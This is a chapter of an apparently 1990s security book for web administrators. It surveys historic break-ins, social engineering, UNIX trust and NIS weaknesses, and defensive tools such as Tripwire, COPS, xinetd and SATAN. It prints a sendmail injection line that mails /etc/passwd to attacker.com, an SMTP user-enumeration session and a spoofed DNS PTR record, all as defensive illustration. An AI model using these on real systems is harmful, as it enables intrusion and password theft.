Much of the material in this chapter provides explicit tips about how to attack a UNIX system. Some of this material is obsolete (but may still apply to systems that have had recent upgrades). All of this material is already widely disseminated among those people who are inclined to attack systems. The material is provided here so that system administrators can be aware of what kinds of attacks are likely to be made.

This section focuses on UNIX since most Web sites are hosted on UNIX servers. UNIX is one of the most powerful operating systems in common use, and with that power, comes vulner-ability.

Other operating systems, such as the various members of the Windows family, have somewhat less functionality and are consequently a bit less vulnerable. The Macintosh is unique in that it has no command-line interface; therefore, it is more resistant to certain kinds of attack.

Exposing the Threat

Many checks for vulnerability are left undone, even though they are simple and they hardly detract from performance and usability. In many cases, the system administrator is unaware of the threat or believes that "it will never happen at my site."

A site need not be operated by a bank or a Fortune 500 company to have assets worth protecting. A site need not be used by the military for war planning to be considered worthy of attack. As the case studies in this section show, sometimes merely being connected to the Internet is enough to cause a site to be infiltrated.

Case Studies

Security needs to be a budgeted item just like maintenance or development. Depending upon the security stance, the budget may be quite small or run to considerable sums. In some organizations, management may need to be convinced that the threat is real. The following case studies illustrate how other sites have been attacked and compromised, as well as government analyses of threats and vulnerabilities.

The Morris Worm  On the evening of November 2, 1988, a program was introduced to the Internet. This program collected key information from the site and then broke into other machines using security holes in existing software. Once on a new system, the program would start the process again.

Within hours, a large percentage of the hosts on the Internet were infected. Many system administrators responded by taking their sites offline, ironically making it impossible for them to get the information that told them how to eliminate the program.

The Morris Worm exploited two vulnerabilities. First, the fingerd daemon had a security hole in its input routine. When the input buffer was overflowed with carefully chosen data, the attacker got access to a privileged login shell.

CAUTION
Any program running as a privileged user should be double-checked to make sure all input is limited to the size of the input buffer.

The second security hole was in sendmail, the UNIX program that routes mail. Sendmail is notoriously difficult to configure, so the developers left a DEBUG feature in place to help system administrators. Many administrators chose to leave DEBUG turned on all the time, which allowed a user to issue a set of commands instead of a user's address. The result: an open door into a privileged shell.

The Morris Worm used several proven techniques to guess passwords. Too many users-indeed, too many system administrators-leave some passwords at vendor defaults. Or they make passwords short, all lowercase, or easy to guess from system or personal information. The off-the-Net program crack can be used by administrators against their own password file to reveal weak passwords.

WANK and OILZ Worms  During October and November 1989, two networks that form part of the Internet came under attack. The SPAN and HEPnet networks included many DEC VAXen running the VMS operating system. The initial attack, called the WANK Worm, targeted these VAXen. It played practical jokes on users, sent annoying messages, and penetrated system accounts.

The WANK Worm attacked only a few accounts on each machine to avoid detection. If it found a privileged account, it would invade the system and start again with systems reachable from the new host.

Within a few weeks, countermeasures were developed and installed that stopped the WANK Worm. The attackers responded with an improved version, called the OILZ Worm. The OILZ Worm fixed some problems with the WANK Worm and added exploitation of the default DECnet account. System administrators who had installed their DECnet software but left the vendor password in place soon found their systems infected.

Ship Sunk from Cyberspace  In March 1991, a ship in the Bay of Biscay was lost in a storm. Intruders had broken into the computers of the European Weather Forecasting Centre in Bracknell, Berkshire and disabled the weather forecasting satellite that would have warned the crew of the impending storm.

Cancer Test Results Corrupted  In 1993, a group of intruders invaded a medical computer and changed the results of a cancer screening test from negative to positive, leading these people to believe they had cancer.

$10,000,000 Stolen from CitiBank  Banks usually do not divulge major thefts, but security experts estimate that about 36 instances of computer theft of over $1,000,000 occur each year in Europe and the United States. One such case came to light when CitiBank requested the extradition of a cracker in St. Petersburg, Russia, for allegedly stealing more than $10,000,000 electronically.

This case is among those documented by Richard O. Hundley and Robert H. Anderson in their 1994 RAND report "Security in Cyberspace: An Emerging Challenge to Society."

Information Infrastructure Targets Listed  In recent years, the Pentagon has begun to talk seriously about Information Warfare (IW). The U.S. used IW techniques in the Gulf War against Iraq, with devastating success.

The July/August 1993 issue of Wired listed 10 Infrastructure Warfare Targets. At least 3 of these are clearly part of the information infrastructure. In his report "CIS Special Report on Information Warfare" for the Computer Security Institute in San Francisco, Richard Power interviewed Dr. Fred Cohen of Management Analytics (Hudson, Ohio), author of Protection and Security on the Information Superhighway.

Dr. Cohen gave detailed scenarios by which the Culpepper Telephone Switch, which carries all U.S. Federal funds transfers, and the Internet could be disrupted, at least temporarily. Dr. Cohen declined to describe attack strategies against the Worldwide Military Command and Control System (WWMCCS), stating, "It's too vital."

Pentagon and RAND Role-Play an Information War  In 1995, Roger C. Molander and a team of researchers at the RAND Institute conducted a series of exercises based on "The Day After…" methodology. RAND led six exercises designed to crystallize the government's understanding of information warfare.

In the scenario, a Middle East state makes a power grab for an oil-rich neighbor. To keep the U.S. from intervening, they launch an IW attack against the U.S. Computer-controlled telephone systems crash, a freight train and a passenger train are misrouted and collide, and computer-controlled pipelines malfunction, triggering oil refinery explosions and fires.

International funds-transfer networks are disrupted, causing stock markets to plummet. Phone systems and computers at U.S. military bases are jammed, making it difficult to deploy troops. The screens on some of the U.S.'s sophisticated electronic weapons begin to flicker as their software crumbles.

In the scenario, there is no smoking gun that points to the aggressor. The participants in the RAND study were asked to prepare their recommendations for the President in less than an hour. The good news is, as system administrators, we need concern ourselves only with keeping our few boxes safe.

Security Awareness

Many security holes can be closed by training staff and users on basic security procedures. Many crackers have acknowledged that it is far simpler to get key information out of human operators than out of technical tricks and vulnerabilities. Here are a few ways crackers can exploit human security holes.

Forgetting Your Password  It has happened to everyone at some point. Returning after some weeks away, logging on to a system that you don't use on a regular basis, you draw a blank. You sit frozen, looking at the blinking cursor and the prompt, Enter Password:.

You were taught, "Never write your password down" and like a good soldier, you obeyed. Now you're locked out, it's 7:00 pm, and the report due in the morning is on the other side of this digital watchdog.

Faced with this situation, many people call their service provider. Most systems administration staff are well-enough trained not to give out the password. Indeed, on UNIX systems, they cannot get access to it.

But they will demand some piece of personal information as identification. The mother's maiden name is common. Once they have "identified" the caller to their satisfaction, they reset the password on the account to some known entry such as the username and give out that password.

NOTE
One common choice for a password is to set the password to be the same as the username. Thus, the password for account jones might be jones. This practice is so common that it has a name: Such accounts are called "joes."
When a user forgets a password, the system operator may set the password so the account is a joe. The user should immediately change the password to something that only he or she knows. Unfortunately, many users don't know how to change their password or ignore this guideline and leave their account as a joe. As a result, most systems have at least one joe through which an attacker can gain access.

There are no perfect solutions to this problem. One partial solution may be to encourage users to write their password down in a very private place. There are many stories of accounts being penetrated using the "I lost my password" story. There are almost no known cases of a password being stolen out of a wallet or purse.

If management decides that they will set the password to a known value on request, develop a procedure to handle the situation. Require something other than the mother's maiden name. (That choice is so common that it's easily obtained.) Don't give the information to the caller.

Tell them to hang up and call them back at the number on file in the records. Do not accept changes to those records by e-mail. Require that people confirm information about a change of address or phone number by fax or regular mail.

CAUTION
Never use the same password for two different systems. Instead, use a mnemonic hook that can be tailored for each system. To log into a system called "Everest," use a password like "Mts2Climb." For a system called "Vision," use "Glasses4Me." Even if the system looks at only the first eight characters, the passwords are unique and not easy to crack with a dictionary or a brute-force attack.

Physical Security  As the leaders in a paperless society, service providers and in-house system administrators generate a lot of paper. Sooner or later, most of that paper ends up in the trash. Crackers have been known to comb the garbage finding printouts of configurations, listings of source code, even handwritten notes and interoffice memos revealing key information that can be used to penetrate the system.

Other crackers, not motivated to dig through garbage cans, arrange a visit to the site. They may come as prospective clients or to interview for a position. They may hire on as a member of the custodial staff or even join the administrative staff.

Take a page from the military's book. Decide what kinds of documents hold sensitive information and give them a distinctive marking. Put them away in a safe place when not in use. Do not allow them to sit open on desktops. When the time comes for them to be destroyed, shred them.

Maintain a visitor's log. Get positive ID on everyone entering sensitive areas for any reason. Do a background check on prospective employees. Post a physical security checklist on the back of the door. Have the last person out check the building to make sure that doors and windows are locked, alarms set, and sensitive information has been put away. Then have them initial the sign-out sheet.

CAUTION
If your shop reuses old printouts as scratch paper, make sure that both sides are checked for sensitive information.

Whom Do You Trust?: Part I  Most modern computer systems establish a small (and sometimes not so small) ring of hosts that they "trust." This web of trust is convenient and increases usability. Instead of having to log in and provide a password for each of several machines, users can log in to their home machine and then move effortlessly throughout the local network. Clearly there are security implications here.

For example, on UNIX systems there is a file called /etc/hosts.equiv. Any host on that list is implicitly trusted. Some vendors ship systems with /etc/hosts.equiv set to trust everyone. Most versions of UNIX also allow a file called .rhosts in each user's home directory, which works like /etc/hosts.equiv.

The .rhosts file is read by the "r" commands, such as rlogin, rcp, rsh, rexec. When user jones on host A attempts an r-command on host B as user smith, host B looks for a .rhosts file in the home directory of smith. Finding one, it looks to see if user jones of host A is trusted. If so, the access is permitted.

All too often, a user will admit anyone from a particular host or will list dozens of hosts. One report, available at

ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z

documents an informal survey of over 200 hosts with 40,000 accounts. About 10% of these accounts had an .rhosts file. These files averaged six trusted hosts each.

Many .rhosts had over 100 entries. More than one had over 500 entries! Using .rhosts, any user can open a hole in security. One can conclude that virtually every host on the Internet trusts some other machine and so is vulnerable. If your host is on a corporate intranet, it may be vulnerable to attack from the Internet if it trusts machines outside its firewall.

The author of the report points out that these sites were not typical. They were chosen because their administrators are knowledgeable about security. Many write security programs. In many cases, the sites were operated by organizations that do security research or provide security products. In other words, these sites may be among the best on the Internet.

Whom Do You Trust?: Part II  Even if a site has /etc/hosts.equiv and .rhosts under control, there are still vulnerabilities in the "trusting" mechanisms. Take the case of the Network File System, or NFS. One popular book on UNIX says of NFS, "You can use the remote file system as easily as if it were on your local computer." That is exactly correct, and that ease of use applies to the cracker as well as the legitimate user.

On many UNIX systems, the utility showmount is available to outside users. showmount -e reveals the export list for a host. If the export list is everyone, all crackers have to do is mount the volume remotely. If the volume has users' home directories, crackers can add a .rhosts file, allowing them to log on at any time without a password.

If the volume doesn't have users' home directories, it may have user commands. Crackers can substitute a Trojan horse, a program that looks like a legitimate user command but contains code to open a security hole for the cracker. As soon as a privileged user runs one of these programs, the cracker is in.

TIP
Export file systems only to known, trusted hosts. When possible, export file systems read-only. Enforce this rule with users who use .rhosts.

Openings Through Trusted Programs  Recall that the Morris Worm used security holes in "safe" programs-programs that have been part of UNIX for years. Although sendmail has been patched, there are ways other standard products can contribute to a breach.

The finger daemon, fingerd, is often left running on systems that have no need for it. Using finger (the client program that talks to fingerd), a cracker can find out who is logged on. (Crackers are less likely to be noticed when there are few users around.)

finger can tell a remote user about certain services. For example, if a system has a user named www or http, it is likely to be running a Web server. If a site has user FTP, it probably serves anonymous FTP.

If a site has anonymous FTP, it may have been configured incorrectly. Anonymous FTP should be run inside a "silver bubble": The system administrator executes the chroot() command to seal off the rest of the system from FTP. Inside the silver bubble, the administrator must supply a stripped-down version of files a UNIX program expects to see, including /etc/passwd.

A careless administrator might just copy the live /etc/passwd into the FTP directory. With a list of usernames, crackers can begin guessing passwords. If the /etc/passwd file has encrypted passwords, all the better. Crackers can copy the file back to their machines and attack passwords without arousing the suspicion of the administrator.

TIP
Make sure that ~ftp and all system directories and files below ~ftp are owned by root and are not writable by any user.

If the system administrator has turned off fingerd, the cracker can exploit rusers instead. The UNIX utility rusers gives a list of users who are logged on to the remote machine. Crackers can use this information to pick a time when detection is unlikely. They can also build up a list of names to use in a password-cracking assault.

Systems that serve diskless workstations often run a simple program called tftp-trivial file transfer protocol. tftp does not support passwords. If tftp is running, crackers can often fetch any file they want, including the password file.

The e-mail server is a source of information to the cracker. Mail is transferred over TCP networks using mail transfer agents (MTAs) such as sendmail. MTAs communicate using the Simple Mail Transfer Protocol (SMTP). By impersonating an MTA, a cracker can learn a lot about who uses a system.

SMTP supports two commands (VRFY and EXPN), which are intended to supply information rather than transfer mail. VRFY verifies that an address is good. EXPN expands a mailing list without actually sending any mail. For example, a cracker knows that sendmail is listening on port 25 and can type

telnet victim.com 25

The target machine responds

220 dse Sendmail AIX 3.2/UCB 5.64/4.03 ready at 20 Mar 1996 13:40:31 -0600

Now the cracker is talking to sendmail. The cracker asks sendmail to verify some accounts. (-> denotes characters typed by the cracker, and <- denotes the system's response):

->vrfy ftp
<-550 ftp... User unknown: No such file or directory
<-sendmail daemon: ftp... User unknown::No such file or directory

->vrfy trung
<-250 Trung Do x1677 <trung>

->vrfy mikem
<-250 Mike Morgan x7733 <mikem>

Within a few seconds, the cracker has established that there is no FTP user but that trung and mikem both exist. Based on knowledge of the organization, the cracker guesses that one or both of these individuals may be privileged users.

Now the cracker tries to find out where these individuals receive their mail. Many versions of sendmail treat expn just like vrfy, but some give more information:

->expn trung
<-250 Trung Do x1677 <trung>

->expn mikem
<-250 Mike Morgan x7733 <mikem@elsewhere.net>

The cracker has established that mikem's mail is being forwarded, and now knows the forwarding address. mikem may be away for an extended period. Attacks on his account may go unnoticed.

Here's another sendmail attack. It has been patched in recent versions of sendmail, but older copies are still vulnerable. The cracker types

telnet victim.com 25
mail from: "|/bin/mail warlord@attacker.com < /etc/passwd"

Older versions of sendmail would complain that the user was unknown but would cheerfully send the password file back to the attacker.

Another program built into most versions of UNIX is rpcinfo. When run with the -p switch, rpcinfo reveals what services are provided. If the target is a Network Information System (NIS) server, the cracker is all but in-NIS offers numerous opportunities to breach security. If the target offers the rexd utility, the cracker can just ask it to run commands. This utility does not look in /etc/hosts.equiv or .rhosts to see if the user is authorized to use the system!

If the server is connected to diskless workstations, rpcinfo shows it running bootparam. By asking bootparam for BOOTPARAMPROC_WHOAMI, crackers get the NIS domain name. Once crackers have the domain names, they can fetch arbitrary NIS maps such as /etc/passwd.

Security Holes in the Network Information System  The Network Information System (NIS), formerly known as the Yellow Pages, is a powerful tool and can be used by crackers to get full access to the system. If the cracker can get access to the NIS server, it is only a short step to controlling all client machines.

TIP
Don't run NIS. If you must run NIS, choose a domain name that is difficult to guess. Note that the NIS domain name has nothing to do with the Internet domain name, such as www.yahoo.com.

NIS clients and servers do not authenticate each other. Once crackers have guessed the domain name, they can put mail aliases on the server to do arbitrary things (like mail back the password file). Once crackers have penetrated a server, they can get the files that show which machines are trusted and attack any machine that trusts another.

Even if the system administrator has been careful to prune down /etc/hosts.equiv and has restricted the use of .rhosts, and even if another single machine is trusted, the cracker can spoof the target into thinking it is the trusted machine.

If a cracker controls the NIS master, he edits the host database to tell everyone that the cracker, too, is a trusted machine. Another trick is to write a replacement for ypserv. The ypbind daemon can be tricked into using this fake version instead of the real one.

Because the cracker controls the fake, the cracker can add his or her own information to the password file. More sophisticated attacks rely on sniffing the NIS packets off the Internet and providing a faked response.

Still another hole in NIS comes from the way /etc/passwd can be incorrectly configured. When a site is running NIS, it puts a plus sign in the /etc/passwd file to tell the system to consult NIS about passwords. Some system administrators erroneously put a plus sign in the /etc/passwd file that they export, effectively making a new user: '+'.

If the system administrator uses DNS instead of NIS, crackers must work a bit harder. Suppose crackers have discovered that victim.com trusts friend.net. They change the Domain Name Server pointer (the PTR record) on their network to claim that their machine is really friend.net. If the original record says

1.192.192.192.in-addr.arpa  IN  PTR  attacker.com

they change it to read

1.192.192.192.in-addr.arpa  IN  PTR  friend.net

If victim.com does not check the IP address but trusts the PTR record, victim.com now believes that commands from attacker.com are actually from the trusted friend.net, and the cracker is in.

Additional Resources to Aid Site Security  The current network world has been likened to the wild West. Most people are law-abiding, but there are enough bad guys to keep everyone on their toes. There is no central authority that can keep the peace. Each community needs to take steps to protect itself.

The first section of this chapter, "Web Security on the Internet and Intranet," tells you what the individual "storekeeper" can do to keep a site secure. This section tells you what the system administrator can do. Many of the cracking techniques described in here are obsolete but are representative of current attacks and vulnerabilities. Newer versions of UNIX have fixed those holes, but new vulnerabilities are being found every day. To stay current, use the resources listed in this section.

The following are some mailing lists that discuss site security:

For some good ideas on how to secure your site, from the people who chase crackers for a living, visit http://www.fbi.gov/compcrim.htm.

You should also visit http://www.cs.purdue.edu/homes/spaf/hotlists/csec-top.html, the comprehensive list of computer security links maintained by Gene Spafford, a leading researcher in this area.

To catch up on the latest security advisories, point your browser at DOE's Computer Incident Advisory Center, http://ciac.llnl.gov/ciac/documents/index.html. This site includes notices from UNIX vendors as well as reports from the field.

http://www.tezcat.com/web/security/security_top_level.html attempts to provide "one-stop shopping" for everything related to computer security. They do a creditable job and are worth a visit.

For an eye-opener about vulnerabilities in your favorite products, visit http://www.c2.org/hacknetscape/, http://www.c2.org/hackjava/, http://www.c2.org/hackecash/, and http://www.c2.org/hackmsoft/.

More general information is available from the Computer Operations and Security Technology (COAST) site at Purdue University: http://www.cs.purdue.edu/coast/coast.html. These are the folks who produce Tripwire.

Danny Smith of the University of Queensland in Australia has written several papers on the topics covered in this chapter. "Enhancing the Security of UNIX Systems" covers specific attacks and the coding practices that defeat them. "Operational Security-Occurrences and Defense" is a summary of the major points of his other papers. These and other papers on this topic are archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

Rob McMillan, also at the University of Queensland, wrote, "Site Security Policy." This paper can be used as the framework to write a Computer Security Policy for a specific organization. It is also archived at ftp://ftp.auscert.org.au/pub/auscert/papers/.

For a real-life account of pursuing a cracker in real time, see Cliff Stoll's Cuckoo's Egg or Bill Cheswick's "An Evening with Berferd In Which A Cracker Is Lured, Endured, and Studied" available at ftp://ftp.research.au.com/dist/internet_security/berferd.ps.

Checklist for Site Security

Several good checklists that point out possible vulnerabilities are available on the Net or in the literature.

File Permissions on Server and Document Roots

Common advice on the Web warns Webmasters not to "run their server as root." This caution has led to some confusion. By convention, Web browsers look at TCP port 80, and only root can open port 80.

So user root must start httpd for the server to offer http on port 80. Once httpd is started, it forks several copies of itself that are used to satisfy client requests. These copies should not run as root. It is common instead to run them as the unprivileged user nobody.

One good practice is to set up a special user and group to own the Web site. Here is one such configuration:

drwxr-xr-x_5_www_www_    1024_Feb 21 00:01 cgi-bin/
drwxr-x--_2_www_www_    1024_Feb 21 00:01 conf/
-rwx------_1_www_www_  109674_Feb 21 00:01 httpd
drwxrwxr-x_2_www_www_    1024_Feb 21 00:01 htdocs/
drwxrwxr-x_2_www_www_    1024_Feb 21 00:01 icons/
drwxr-x--_2_www_www_    1024_Feb 21 00:01 logs/

In this example, the site is owned by user www of group www. The CGI-BIN directory is world-readable and executable, but only the site administrator can add or modify CGI Scripts. The configuration files are locked away from non-www users completely, as is the httpd binary. The document root and icons are world-readable. The logs are protected.

On some sites, it is appropriate to grant write access to the CGI-BIN directory to trusted authors or to grant read access to the logs to selected users. Such decisions are part of the trade-off between usability and security discussed in the section entitled "Simple Privacy."

Optional Server Features

Another such trade-off is in the area of optional server features. Automatic directory listings, symbolic link following, and server-side includes (especially exec) each afford visibility and control to a potential cracker. The site administrator must weigh the needs of security against user requests for flexibility.

Freezing the System: Tripwire

One common cracker trick is to infiltrate the system as a non-privileged user, change the path so that their version of some common command such as ls gets run by default, and then wait for a privileged user to run his or her command. Such programs, Trojan horses, can be introduced to the site in many ways.

Here's one way to defend against this attack. Install a clean version of the operating system and associated utilities. Before opening the site to the network, run Tripwire, from ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/. Tripwire calculates checksums for key system files and programs.

Print out a copy of the checksums and store them in a safe place. Save a copy to a disk, such as a floppy disk, that can be write-locked. After the site is connected to the Internet, schedule Tripwire to run from the crontab-it will report any changes to the files it watches.

Another good check is to visually inspect the server's access and error logs. Scan for UNIX commands like rm, login, and /bin/sh. Look for anyone trying to invoke Perl. Watch for extremely long lines in URLs.

The earlier "The Morris Worm" section shows how a C or C++ program can have its buffer overflowed. Crackers know that a common buffer size is 1,024. They will attempt to send many times that number of characters to a POST script to crash it.

If your site uses access.conf or .htaccess for user authentication, look for repeated attempts to guess the password. Better still, put in your own authenticator, like the one described in the "Password-Protection Scripts" section, and limit the number of times a user can guess the password before the username is disabled.

Checking File Permissions Automatically

The Computer Oracle and Password System (COPS) is a set of programs that report file, directory, and device permissions problems. It also examines the password and group files, the UNIX startup files, anonymous FTP configuration, and many other potential security holes.

COPS includes the Kuang Rule-Based Security Checker, an expert system that tries to find links from the outside world to the superuser account. Kuang can find obscure links. For example, given the goal, "become superuser," Kuang may report a path like:

member workGrp,
write ~jones/.cshrc,
member staff,
write /etc,
replace /etc/passwd,
become root.

This sequence says that if an attacker can crack the account of a user who is a member of group workGrp, the cracker could write to the startup file used by user jones. The next time jones logs in, those commands are run with the privileges of jones.

jones is a member of the group staff who can write to the /etc directory. The commands added to jones's startup file could replace /etc/password with a copy, giving the attacker a privileged account. On a UNIX system with more than a few users, COPS is likely to find paths that allow an attack to succeed. COPS is available at ftp://archive.cis.ohio-state.edu/pub/cops/1.04+.

CRACK

CRACK is a powerful password cracker. It is the sort of program that attackers use if they can get a copy of a site's password file. Given a set of dictionaries and a password file, CRACK can often find 25 to 50% of the passwords on a site in just a few hours.

CRACK uses the gecos information in the password file, words from the dictionary, and common passwords like qwerty and drowssap (password spelled backwards). Crack can spread its load out over a network, so it can work on large sites by using the power of the network itself.

CRACK is available at ftp://ftp.uu.net/usenet/comp.sources.misc/volume28.

TAMU Tiger

Texas A&M University distributes a program similar to a combination of COPS and Tripwire. It scans a UNIX system as COPS does, looking for holes. It also checksums system binaries like Tripwire. For extra security, consider using all three-Tiger, COPS, and Tripwire.

Source for various tools in the TAMU security project is archived at ftp://net.tamu.edu/pub/security/TAMU.

xinetd

UNIX comes with a daemon called inetd, which is responsible for managing the TCP "front door" of the machine. Clearly, inetd could play a role in securing a site, but the conventional version of inetd has no provision for user authentication. A service such as telnet or FTP is either on or off.

To fill this need, Panagiotis Tsirigotis (panos@cs.colorado.edu) developed the "extended inetd" or xinetd. The latest source file is available at ftp://mystique.cs.colorado.edu. The file is named xinetd-2.1.4.tar and contains a Readme file showing the latest information.

Configuring xinetd  Once xinetd has been downloaded and installed, each service is configured with an entry in the xinetd.conf file. The entries have the form

service <service_name>
{
_<attribute> <assign_op> <value> <value> ...
}

Valid attributes include

The access control directives are

only_from and no_access take hostnames, IP addresses, and wildcards as values. access_times takes, of course, time ranges. disabled turns the service off completely and disables logging-off attempts.

TIP
Do not use disabled to turn off a service. Instead, use no_access 0.0.0.0. In this way, attempts to access the service are logged, giving early warning of a possible attack.

Detecting Break-In Attempts  As this chapter shows, cracking a system is an inexact art. The cracker probes areas of likely vulnerability. When one of the probes succeeds (and the determined cracker almost always gets in eventually), the first order of business is cleaning up the evidence of the break-in attempts.

By logging unsuccessful attempts and examining the logs frequently, the system administrator can catch some of these break-in attempts and alert the IRT.

After watching the xinetd log for a while, system administrators begin to notice patterns of use and can design filters and tools to alert them when the log's behavior deviates from the pattern.

For example, a simple filter to detect failed attempts can be built in one line:

grep "FAIL" /var/log/xinetd.log

Each failure line gives the time, the service, and the address from which the attempt was made. A typical pattern for a site with a public httpd server might be infrequent failures of httpd because it would usually not have any access restrictions and somewhat more frequent failures of other services.

For example, if the system administrator has restricted telnet to the time period of 7 am to 7 pm, there will be a certain number of failed attempts in the mid-evening and occasionally late at night.

Suppose the system administrator determines that any attempt to telnet from outside the 199.199.0.0 world is unusual, and more than one failed telnet attempt between midnight and 7 am is unusual. A simple Perl script would split the time field and examine the values, and could also count the number of incidences (or pipe the result out to wc -l).

Another good check is to have the script note the time gap between entries. A maximum allowable gap is site-specific and varies as the day goes on. Large gaps are evidence that some entries may have been erased from the log and should serve as warnings.

Such a script could be put into the crontab, but an attacker is likely to check for security programs there. If the system supports personal crontabs, consider putting this script in the crontab of a random user.

Otherwise, have it reschedule itself using the UNIX batch utility, called at, or conceal it with an innocuous-sounding name. These techniques make it less likely for a successful cracker to discover the log filter and disable the warning.

Anytime the log shows evidence that these warning limits have been violated, the script can send e-mail to the system administrator. The administrator will also want to visually check the log from time to time to make sure the patterns haven't changed.

Catching the Wily Cracker

Sooner or later, it's bound to happen. The xinetd logs show a relentless attack on telnet or ftpd or fingerd. Or worse still, they don't show the attack, but there's an unexplained gap in the log. The site has been penetrated. Now is the time to call the your computer security Incident Response Team (IRT) if your organization has one. Depending on what the attacker has done, a call to the appropriate law enforcement agency may also be in order.

TIP
If your organization doesn't have an IRT, don't wait until an attack to form one. Check out Danny Smith's excellent paper, "Forming an Incident Response Team," available at ftp://ftp.auscert.org.au/pub/auscert/papers/.

To start the investigation, look at the log entries to determine where the attack came from. The log will show an IP address. As this chapter shows, such information can be forged, but knowing the supposed IP is at least a starting point.

To check out an IP address, start with the InterNIC-the clearinghouse for domain names operated by the U.S. government. Use telnet to connect to rs.internic.net. At the prompt, enter whois and the first three octets from the log. For example, if the log says the attack came from 199.198.197.1, enter

whois 199.198.197

This query should return a record showing who is assigned to that address. If nothing useful is revealed, examine higher-level addresses, such as

whois 199.198

Eventually the search should reveal an organization's name. Now at the whois: prompt, enter that name. The record that whois returns will list the names of one or more coordinators. That person should be contacted (preferably by the IRT) so that they can begin checking on their end.

NOTE
Remember that the IP address may be forged, and the organization (and its staff) may be completely innocent. Be careful about revealing any information about the investigation outside official channels, both to avoid tipping the intruder and to avoid slandering an innocent organization.
Remember, too, that any information sent by e-mail can be intercepted by the cracker. The cracker is likely to monitor e-mail from root or from members of the security group. Even if mail is encrypted, the recipient can be read and a cracker can be tipped off by seeing e-mail going to the IRT. Use the phone or the fax for initial contacts to the IRT, or exchange e-mail on a system that is not under attack.

Work with the IRT and law enforcement agencies to determine when to block the cracker's attempts. Once crackers are blocked, they may simply move to another target or attack again, being more careful to cover their tracks. Security personnel may want to allow the attacks to continue for a time while they track the cracker and make an arrest.

Firewalls

Much has been said in the news media about the use of firewalls to protect an Internet site. Firewalls have their place and, for the most part, they do what they set out to do. Bear in mind that many of the attacks described in this chapter will fly right through a firewall.

Installing a firewall is the last thing to do for site security, in the literal sense. Follow the recommendations given here for making the site secure so that a cracker has to work hard to penetrate security. Then, if further security is desired, install a firewall.

Using this strategy, the system administrator does not get a false sense of security from the firewall. The system is already resistant to attack before the firewall is installed. Attackers who get through the firewall still have their work cut out for them.

Because most systems will continue to have negligible security for the foreseeable future, one can hope that the cracker who gets through the firewall, only to face your seemingly impregnable server, will get discouraged and go prey on one of the less-protected systems.

A firewall computer sits between the Internet and a site, screening or filtering IP packets. It is the physical embodiment of much of a site's security policy. For example, the position taken in the tradeoff between usability and security is called a site's "stance."

A firewall can be restrictive, needing explicit permission before it authorizes a service, or permissive, permitting anything that has not been disallowed. In this way, configuring firewall software is akin to configuring xinetd.

Several designs are available for firewalls. Two popular topologies are the Dual-Homed Gateway and the Screened Host Gateway, illustrated in Figures 23.2 and 23.3, respectively.

Figure 23.2 : A Dual-Homed Gateway sits between the Internet and the local network.

Figure 23.3 : A Screened Host Gateway watches incoming packets and passes only authorized requests on to the local network.


The Web server can be run on the bastion host in either topology or inside the firewall with the screened host topology. Other locations are possible but need more complex configuration and sometimes additional software.

Marcus Ranum provides a full description of these and other topologies in his paper, "Thinking About Firewalls," available at ftp://ftp.tis.com/pub/firewalls/firewalls.ps.Z.

Both commercial and free software is available to implement the firewall function. The Firewall Toolkit, available at ftp://ftp.tis.com/pub/firewalls/toolkit/fwtk.tar.Z, is representative.

Security Administrator's Tool for Analyzing Networks

The classic paper on cracking is "Improving the Security of Your Site by Breaking into It," available online at ftp://ftp.win.tue.nl/pub/security/admin-guide-to-cracking.101.Z.

Dan Farmer and Wietse Venema describe many attacks (some now obsolete). They also propose a tool to automatically check for certain security holds. The tool was ultimately released under the name Security Administrator's Tool for Analyzing Networks (SATAN).

SATAN is an extensible tool. Any executable put into the main directory with the extension .Sat is executed when SATAN runs. Information on SATAN is available at http://www.fish.com/satan/.

SATAN's Good Behavior

Once SATAN is installed and started, it "explores the neighborhood" with DNS and a fast version of ping to build a set of targets. It then runs each test program over each target.

When all test passes are complete, SATAN's data filtering and interpreting module analyzes the output, and a reporting program formats the data for use by the system administrator.

ON THE WEB
http://www.netsurf.com/nsf/latest.focus.html  This site contains many links to security-related sites. Also, you can read articles about specific security topics, such as JavaScript security holes.

Making Sure You Have a Legitimate Version of SATAN

For some functions, SATAN must run with root privilege. One way an infiltrator might break into a system is to distribute a program that masquerades as SATAN or add .sat tests that actually widen security holes.

To be sure you have a legitimate version of SATAN, check the MD5 message digest fingerprint. The latest fingerprints for each component are available at http://www.cs.ruu.nl/cert-uu/satan.html.

Electronic Data Interchange via the Internet

As businesses become more sophisticated, they have begun moving toward Electronic Commerce. Electronic Commerce includes the specialized area of Electronic Data Interchange (EDI). True EDI adheres to rigorous standards and often is delivered over special networks.

A site owner can send e-mail to a wholesaler ordering merchandise at any time, but that doesn't make the exchange EDI. EDI is characterized by four factors:

The third factor might seem a bit odd. For many purchases, there's little need for a sales representative to contact a buyer personally. For commodity items, such personal contact prior to the sale represents an added expense for the seller that must be passed on to the buyer. The value added by such salespeople has traditionally been to make the buyer aware of their company as a supplier.

True EDI is conducted mostly over specialized value-added networks (VANs). These VANs serve to "introduce" trading partners who have no prior business relationship. Although each VAN is different, here's how EDI generally works:

  1. Sellers register their businesses on one of the VANs, using standardized codes to identify what goods or services they sell.
  2. Buyers post Requests for Quotations (RFQs) to the VANs in a standardized format.
  3. The VAN delivers RFQs to the appropriate sellers by e-mail.
  4. A seller analyzes each RFQ and prepares a bid, which is posted on the VAN.
  5. The VAN delivers the RFQ back to the buyer.

If the seller wins the bid, the buyer sends a PO message back through the VAN. A contract award message is posted, and in many cases (for example, if the buyer is the U.S. government), the winning price is announced.

There are two major sets of standards used in EDI. The international standard, promulgated by the United Nations, is called EDIFACT. The U.S. standard is called X12. The ISO adopted EDIFACT in 1987 as its standard. The U.N. and ANSI have announced that, as of 1997, EDIFACT and X12 will be merged.

NOTE
The alignment plan was adopted by a mail ballot of X12 in December 1994-January 1995. That plan is available online at http://polaris.disa.org/edi/ALIGNMEN/ALINPLAN.htp. The text of the floor motion adopted at the February 1995 X12 meeting is at http://polaris.disa.org/edi/ALIGNMEN/ALINMOTN.htp.
Note that the Data Interchange Standards Association (DISA) is in the process of reorganizing their server. If you cannot find the information at the above URLs, go to http://www.disa.org/ and follow the links to the search page. There, search for references to "alignment," and you'll get the latest URLs.

Much of the impetus behind EDI has come from the U.S. government. On October 26, 1993, President Clinton signed an executive memorandum requiring federal agencies to implement the use of electronic commerce in federal purchases as quickly as possible. The order specified that by the end of FY 1997, most U.S. federal purchases under $100,000 must be made by EDI.

